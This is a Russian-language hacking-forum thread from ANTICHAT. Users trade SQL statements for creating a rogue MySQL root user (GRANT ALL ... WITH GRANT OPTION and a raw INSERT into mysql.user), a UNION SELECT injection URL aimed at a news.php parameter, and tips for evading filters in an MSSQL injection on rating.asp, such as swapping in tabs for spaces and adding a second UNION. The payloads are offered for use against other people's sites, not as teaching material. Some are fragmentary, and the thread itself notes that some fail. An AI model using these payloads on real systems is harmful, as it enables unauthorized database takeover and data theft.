ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Собсна,вопрос: Как создать пользователя в бд с правами рута,если есть доступ к mysql.user?

GRANT ALL PRIVILEGES ON *.* TO xek@% IDENTIFIED BY "пароль" WITH GRANT OPTION

или

INSERT INTO user VALUES("%","xek",PASSWORD("пароль"),"Y","Y", "Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y ");

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

news.php?id=850+union+select+0,1,2,3,4,GRANT+ALL+P RIVILEGES+ON+*.*+TO+0xek@%+IDENTIFIED+BY+"паро ль"+WITH+GRANT+OPTION,6,7+from+mysql.user/*

таг?) откуда столько Y :PP

не получится, если идет select ты никак не проведешь update или любой другой запрос кроме select и union select

__________________

Такая проблемка, в MSSQL обычная инъекция /rating.asp?sender=1'
sender при вводе фильтруется на пробел, плюс и дефис. Пробел заменил на таб %09, не знаю что с дефисом сделать. А без него не закомментить ненужную часть запроса,
там остаётся: ' order by blablabla
Другой комент /* выдаёт ошибку, # тоже не коментит =\

Например
вызывает ошибку

Microsoft OLE DB Provider for SQL Server ошибка '80040e14'
Unclosed quotation mark after the character string ' group by sender'.

т.е. строка получается:
Можно это как-то обойти?

Можно. Просто сделать второй юнион

пробовал, но ещё бы я знал названия таблиц и колнок

Ну information_schema должна быть.
Что-то типа того

Блин, никак не канает
Узнал по ошибкам, что таблица rating, есть колонки ID и Sender.
ошибка:
Column 'rating.Sender' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

т.е. запрос "SELECT sender FROM rating WHERE '1'='1' group by sender" не канает... хз какой там оригинальный запрос